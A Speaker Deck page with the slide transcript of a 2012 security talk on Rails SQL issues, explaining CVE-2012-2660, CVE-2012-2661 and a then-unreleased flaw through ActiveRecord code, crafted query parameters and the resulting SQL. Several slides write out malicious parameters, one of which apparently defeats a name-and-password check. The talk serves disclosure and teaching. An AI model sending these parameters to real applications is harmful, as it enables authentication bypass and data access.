Upgrade to Pro — share decks privately, control downloads, hide ads and more …

"Recent Rails SQL Issues" - 2012

Avatar for Justin Collins Justin Collins
April 23, 2015
Programming
0
65

"Recent Rails SQL Issues" - 2012

Avatar for Justin Collins

Justin Collins

April 23, 2015
Tweet

More Decks by Justin Collins

See All by Justin Collins
Continuous (Application) Security at DevOps Velocity
Avatar for Justin Collins presidentbeef
0
130
The Evolution of Rails Security
Avatar for Justin Collins presidentbeef
1
790
Brakeman RailsConf 2017 Lightning Talk
Avatar for Justin Collins presidentbeef
0
130
Practical Static Analysis for Continuous Application Security
Avatar for Justin Collins presidentbeef
0
190
"...But Doesn't Rails Take Care of Security for Me?"
Avatar for Justin Collins presidentbeef
1
420
Continuous Security with Practical Static Analysis
Avatar for Justin Collins presidentbeef
1
300
Security Automation at Twitter - Rise of the Machines
Avatar for Justin Collins presidentbeef
0
220
The World of Rails Security - RailsConf 2015
Avatar for Justin Collins presidentbeef
8
1.2k
Tales from the Crypt
Avatar for Justin Collins presidentbeef
1
220

Other Decks in Programming

See All in Programming
複雑なフォームを継続的に開発していくための技術選定・設計・実装 #tskaigi / #tskaigi2025
Avatar for Masayuki Izumi izumin5210
9
2.6k
TypeScript Language Service Plugin で CSS Modules の開発体験を改善する
Avatar for mizdra mizdra
PRO
2
470
Feature Flag 自動お掃除のための TypeScript プログラム変換
Avatar for azarashi azrsh
PRO
4
220
Global Azure 2025 @ Kansai / Hyperlight
Avatar for kosmosebi kosmosebi
0
170
「MCPを使ってる人」が より詳しくなるための解説
Avatar for Kota-Yamaguchi yamaguchidesu
0
260
事業KPIを基に価値の解像度を上げる
Avatar for Nealle nealle
0
160
技術的負債と戦略的に戦わざるを得ない場合のオブザーバビリティ活用術 / Leveraging Observability When Strategically Dealing with Technical Debt
Avatar for yoshiyoshifujii yoshiyoshifujii
0
120
DevDay2025-OracleDatabase-kernel-addressing-history
Avatar for oracle4engineer oracle4engineer
PRO
1
160
AWS Summit Hong Kong 2025: Reinventing Programming - How AI Transforms Our Enterprise Coding Approach
Avatar for Ernest Chiang dwchiang
0
150
Browser and UI #2 HTML/ARIA
Avatar for ken7253 ken7253
2
190
コンポーネントライブラリで実現する、アクセシビリティの正しい実装パターン
Avatar for Tajima Sachiko schktjm
1
240
Building an Application with TDD, DDD and Hexagonal Architecture - Isn't it a bit too much?
Avatar for Mufrid Krilic mufrid
0
260

Featured

See All Featured
"I'm Feeling Lucky" - Building Great Search Experiences for Today's Users (#IAC19)
Avatar for Dan Newman danielanewman
227
22k
Gamification - CAS2011
Avatar for David Bonilla davidbonilla
81
5.3k
4 Signs Your Business is Dying
Avatar for Josh Pigford shpigford
183
22k
For a Future-Friendly Web
Avatar for Brad Frost brad_frost
177
9.7k
ピンチをチャンスに:未来をつくるプロダクトロードマップ #pmconf2020
Avatar for Aki / @LoveIdahoBurger aki_iinuma
122
52k
Balancing Empowerment & Direction
Avatar for Lara Hogan lara
0
49
Speed Design
Avatar for Sergey Chernyshev sergeychernyshev
30
950
Why You Should Never Use an ORM
Avatar for John Nunemaker jnunemaker
PRO
56
9.4k
What's in a price? How to price your products and services
Avatar for Michael Herold michaelherold
245
12k
Measuring & Analyzing Core Web Vitals
Avatar for Philip Tellis bluesmoon
7
440
Design and Strategy: How to Deal with People Who Don’t "Get" Design
Avatar for Morgane Peng morganepeng
129
19k
The Psychology of Web Performance [Beyond Tellerrand 2023]
Avatar for Tammy Everts tammyeverts
47
2.8k

Transcript

  1. Rails Vulnerabilities Last Week CVE-2012-2660 CVE-2012-2661

  2. CVE-2012-2660 Allows unexpected “IS NULL” in queries Affects Rails 2.x

    and 3.x

  3. ActiveRecord Query unless params[:name].nil? @user = User.where(:name => params[:name]) end

  4. Query Parameters ?name[] {"name"=>[nil]}

  5. ActiveRecord Query unless [nil].nil? @user = User.where(:name => [nil]) end

  6. Resulting SQL SELECT "users".* FROM "users" WHERE "users"."name" IS NULL

  7. CVE-2012-2661 Allows some manipulation of WHERE clause via “dotted” query

    keys Affects Rails 3.x

  8. ActiveRecord Query User.where(:name => params[:name])

  9. ActiveRecord Query User.where("users.name" => params[:name])

  10. Query Parameters ?name[users.id]=1 {"name"=>{"users.id"=>"1"}}

  11. ActiveRecord Query User.where(:name => {"users.id" => "1"})

  12. Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =

    1

  13. Unreleased Vulnerability Allows some manipulation of WHERE clause via nested

    hashes in query values Affects 2.3.x and 3.x

  14. ActiveRecord Query User.where(:name => params[:name], :password => params[:password])

  15. Query Parameters ?name[users][id]=1&password[users][id]=1 {"name"=>{"users"=>{"id"=>"1"}}, "password" =>{"users"=>{"id"=>"1"}}}

  16. ActiveRecord Query User.where( :name => {"users"=>{"id"=>"1"}, :password => {"users"=>{"id"=>"1"} )

  17. Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =

    1 AND "users"."id" = 1